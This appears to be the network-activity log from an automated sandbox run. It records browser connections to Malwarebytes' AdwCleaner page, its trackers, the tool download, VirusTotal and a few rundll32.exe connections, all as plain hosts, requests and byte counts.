                                                                                                                                                                      GET https://api.demandbase.com/api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      401
                                                                                                                                                                    • 104.16.148.64:443
                                                                                                                                                                      https://cdn.cookielaw.org/logos/static/powered_by_logo.svg
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.0kB
                                                                                                                                                                      108.4kB
                                                                                                                                                                      61
                                                                                                                                                                      97

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/6.38.0/otBannerSdk.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/logos/static/powered_by_logo.svg

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 142.250.179.202:443
                                                                                                                                                                      https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      6.6kB
                                                                                                                                                                      17
                                                                                                                                                                      18

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto
                                                                                                                                                                    • 104.16.148.64:443
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/otCommonStyles.css
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      39.2kB
                                                                                                                                                                      35
                                                                                                                                                                      46

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/82971089-2677-4e1e-8fab-44444f76330b.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/eef9d10b-0829-4459-966f-9c7317989fae/en.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/v2/otPcPanel.json

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/otCommonStyles.css

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.18.27.85:443
                                                                                                                                                                      https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      3.8kB
                                                                                                                                                                      15
                                                                                                                                                                      13

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 157.240.247.8:443
                                                                                                                                                                      connect.facebook.net
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.3kB
                                                                                                                                                                      146.8kB
                                                                                                                                                                      70
                                                                                                                                                                      122
                                                                                                                                                                    • 95.101.74.227:443
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.beta.min.js
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.8kB
                                                                                                                                                                      11.2kB
                                                                                                                                                                      17
                                                                                                                                                                      22

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://snap.licdn.com/li.lms-analytics/insight.min.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://snap.licdn.com/li.lms-analytics/insight.beta.min.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 204.79.197.200:443
                                                                                                                                                                      bat.bing.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      21.3kB
                                                                                                                                                                      28
                                                                                                                                                                      33
                                                                                                                                                                    • 199.232.148.157:443
                                                                                                                                                                      static.ads-twitter.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      21.4kB
                                                                                                                                                                      21
                                                                                                                                                                      27
                                                                                                                                                                    • 104.16.122.175:443
                                                                                                                                                                      https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      5.1kB
                                                                                                                                                                      17
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 23.46.212.45:443
                                                                                                                                                                      https://munchkin.marketo.net/162/munchkin.js
                                                                                                                                                                      tls, http
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      11.7kB
                                                                                                                                                                      17
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://munchkin.marketo.net/munchkin.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://munchkin.marketo.net/162/munchkin.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 152.199.2.76:443
                                                                                                                                                                      cdn.bizible.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.9kB
                                                                                                                                                                      41.2kB
                                                                                                                                                                      51
                                                                                                                                                                      54
                                                                                                                                                                    • 142.250.179.142:443
                                                                                                                                                                      https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      8.5kB
                                                                                                                                                                      17
                                                                                                                                                                      16

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                    • 104.244.42.5:443
                                                                                                                                                                      https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      4.3kB
                                                                                                                                                                      14
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.244.42.67:443
                                                                                                                                                                      https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      14
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 142.250.27.154:443
                                                                                                                                                                      https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      6.4kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                    • 104.18.27.85:443
                                                                                                                                                                      https://privacyportal.onetrust.com/request/v1/consentreceipts
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      18.0kB
                                                                                                                                                                      3.7kB
                                                                                                                                                                      26
                                                                                                                                                                      18

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://privacyportal.onetrust.com/request/v1/consentreceipts

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      201
                                                                                                                                                                    • 108.156.60.54:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.0kB
                                                                                                                                                                      4.8kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.54:443
                                                                                                                                                                      https://adwcleaner.malwarebytes.com/adwcleaner?channel=release
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      223.3kB
                                                                                                                                                                      9.1MB
                                                                                                                                                                      4502
                                                                                                                                                                      6498

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://adwcleaner.malwarebytes.com/adwcleaner?channel=release

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 172.217.168.194:443
                                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      7.7kB
                                                                                                                                                                      18
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                    • 192.28.144.124:443
                                                                                                                                                                      805-usg-300.mktoresp.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 13.107.42.14:443
                                                                                                                                                                      px.ads.linkedin.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.7kB
                                                                                                                                                                      9.0kB
                                                                                                                                                                      18
                                                                                                                                                                      22
                                                                                                                                                                    • 65.9.86.29:443
                                                                                                                                                                      https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      7.5kB
                                                                                                                                                                      16
                                                                                                                                                                      20

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 157.240.221.35:443
                                                                                                                                                                      www.facebook.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      22.7kB
                                                                                                                                                                      4.2kB
                                                                                                                                                                      32
                                                                                                                                                                      26
                                                                                                                                                                    • 142.250.179.163:443
                                                                                                                                                                      https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      8.7kB
                                                                                                                                                                      11.4kB
                                                                                                                                                                      23
                                                                                                                                                                      22

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                    • 34.104.35.123:80
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      http
                                                                                                                                                                      13.5kB
                                                                                                                                                                      541.1kB
                                                                                                                                                                      211
                                                                                                                                                                      396

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      HEAD http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                    • 23.236.181.126:443
                                                                                                                                                                      https
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      88.9kB
                                                                                                                                                                      29.6kB
                                                                                                                                                                      103
                                                                                                                                                                      80
                                                                                                                                                                    • 127.0.0.1:15570
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      12.6kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      26
                                                                                                                                                                      21

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://beacons.gcp.gvt2.com/domainreliability/upload

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 34.65.65.90:443
                                                                                                                                                                      https://e2c19.gcp.gvt2.com/nel/
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      5.9kB
                                                                                                                                                                      16
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://e2c19.gcp.gvt2.com/nel/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      204
                                                                                                                                                                    • 142.251.36.35:443
                                                                                                                                                                      https://beacons.gvt2.com/domainreliability/upload
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      6.7kB
                                                                                                                                                                      18
                                                                                                                                                                      16

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://beacons.gvt2.com/domainreliability/upload
                                                                                                                                                                    • 34.101.85.36:443
                                                                                                                                                                      https://e2cs09.gcp.gvt2.com/nel/
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      5.9kB
                                                                                                                                                                      16
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://e2cs09.gcp.gvt2.com/nel/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      204
                                                                                                                                                                    • 34.101.85.36:443
                                                                                                                                                                      e2cs09.gcp.gvt2.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      5.6kB
                                                                                                                                                                      15
                                                                                                                                                                      15
                                                                                                                                                                    • 216.239.34.21:80
                                                                                                                                                                      http://virustotal.com/
                                                                                                                                                                      http
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      755 B
                                                                                                                                                                      456 B
                                                                                                                                                                      7
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://virustotal.com/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      302
                                                                                                                                                                    • 216.239.34.21:80
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      236 B
                                                                                                                                                                      156 B
                                                                                                                                                                      5
                                                                                                                                                                      3
                                                                                                                                                                    • 172.217.169.99:443
                                                                                                                                                                      https://beacons2.gvt2.com/domainreliability/upload
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      6.8kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://beacons2.gvt2.com/domainreliability/upload
                                                                                                                                                                    • 216.239.34.21:443
                                                                                                                                                                      https://virustotal.com/
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      14
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://virustotal.com/
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      44.7kB
                                                                                                                                                                      1.5MB
                                                                                                                                                                      774
                                                                                                                                                                      1320

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/static/fonts/iosevka-regular.woff2

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/static/fonts/googlesans-regular.ttf

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/main.46e78b391f917115852c.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/images/logo.svg

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/images/omnibar/vt_logo.svg

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://www.virustotal.com/ui/signin

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/stackdriver-errors.239a9bb4d545f6f3f8ee.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3789.1cda18a27da511a6130f.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/9262.42622b96b2a29faebecd.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3494.4fe91483bcd041f676d8.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/vt-ui-shell-extra-deps.622a81b0530a0b62d881.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/vt-ui-sw-installer.e0eb1a1e08d6512ba355.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/static/qrcode.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/static/opensearch.xml

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/images/favicon.png

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/service-worker.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/images/manifest/icon-192x192.png

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/sha256.worker.a6e2f1b9e97a4ea0b474.worker.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/submission/challenge

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4503.2b0c4f32872d924210c7.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/5005.fc3caf94a0684737c1fd.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/9074.7e2a5bbdfe0196aa5d0a.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/9965.2fd257c2ca1b9b66cc0d.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4311.914d50b4d95aacf7225b.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/7953.9a6e2044f0e511868a41.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/6885.e13d423275cffe8e0382.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/2592.8400c60cdfd274a4145e.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/5701.707b0c8562c1cae0df7d.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3334.065f1a91b60b07b0c5dc.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/7922.24578c1a71b32f0e51d1.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3586.e264ac9d790c1a369398.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4985.08366cc6bafa91f6babf.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4092.621dfd5c355e77ea7563.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/773.3b2bdb4fc65a8555b424.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4987.4434b42958784426cabc.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/9518.4aad3aaaab65e67ec065.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/7858.70d036f29802d9321f7f.js

